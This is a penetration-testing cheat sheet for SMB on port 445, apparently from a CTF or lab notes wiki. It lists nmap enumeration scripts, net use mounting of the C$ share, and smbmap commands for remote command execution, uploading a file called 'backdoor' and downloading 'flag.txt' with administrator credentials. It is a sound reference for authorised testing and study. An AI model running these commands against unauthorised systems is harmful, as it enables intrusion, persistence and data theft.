SMB

Port: 445

SMB Discover and Mount

Nmap command to check port 445/tcp open

PS> nmap <ip address/cidr> --open

Right click on Network
Map network drive
Enter the IP address of the target machine as: \\<ip address>
Click on Browse
Double click on the IP address
Enter Username and Password
Ok

Remove existing mounted drive using CMD

net use * /delete

Mount the remote SMB drive using CMD

net use Z: \\<ip address>\C$ <password> /user:<username>

SMBMap

Check supported protocols and dialects of an SMB server

nmap -p 445 --script smb-protocols <IP address>

Access SMB Server

smbmap -u guest -p "" -d . -H <IP address>

Access the remote shares using admin creds

smbmap -u administrator -p <password> -d . -H <IP address>

Execute commands on the target machine

smbmap -H <IP address> -u administrator -p <password> -x 'ipconfig'

List available drives

smbmap -H <IP address> -u Administrator -p '<password>' -L

List Contents of C: drive

smbmap -H <IP address> -u Administrator -p '<password>' -r 'C$'

Create a backdoor file and Upload to the target machine

smbmap -H <IP address> -u Administrator -p '<password>' --upload '/root/backdoor' 'C$\backdoor'

Download a file

smbmap -H <IP address> -u Administrator -p '<password>' --download 'C$\flag.txt'

SMB Nmap Scripts

Get the information about SMB security level

nmap -p 445 --script smb-security-mode <IP address>

Enumerate the users logged into a system

nmap -p445 --script smb-enum-sessions <IP address>

nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=<password> <IP address>

Enumerate all available shares

nmap -p445 --script smb-enum-shares <IP addr>

Enumerate all available shares using valid creds

nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=<password> <IP addr>

Enumerate the windows users

nmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=<password> <IP address>

Get information about the server statistics

nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=<password> <IP address>

Enumerate available domains

nmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=<password> <IP address>

Enumerate available groups

nmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=<password> <IP addr>

Enumerate Services

nmap -p445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=<password> <IP address>

Enumerating all the shared folders and drives then running the ls command in each shares

nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=<password> <IP addr>

PreviousHost Discovery NextMSSQL

Last updated 1 year ago

Was this helpful?

SMB Discover and Mount

Nmap command to check port 445/tcp open

Steps to connect to SMB share on windows

Remove existing mounted drive using CMD

Mount the remote SMB drive using CMD

SMBMap

Check supported protocols and dialects of an SMB server

Access SMB Server

Access the remote shares using admin creds

Execute commands on the target machine

List available drives

List Contents of C: drive

Create a backdoor file and Upload to the target machine

Download a file

SMB Nmap Scripts

Get the information about SMB security level

Enumerate the users logged into a system

Enumerate the users logged into a system through SMB share using creds

Enumerate all available shares

Enumerate all available shares using valid creds

Enumerate the windows users

Get information about the server statistics

Enumerate available domains

Enumerate available groups

Enumerate Services

Enumerating all the shared folders and drives then running the ls command in each shares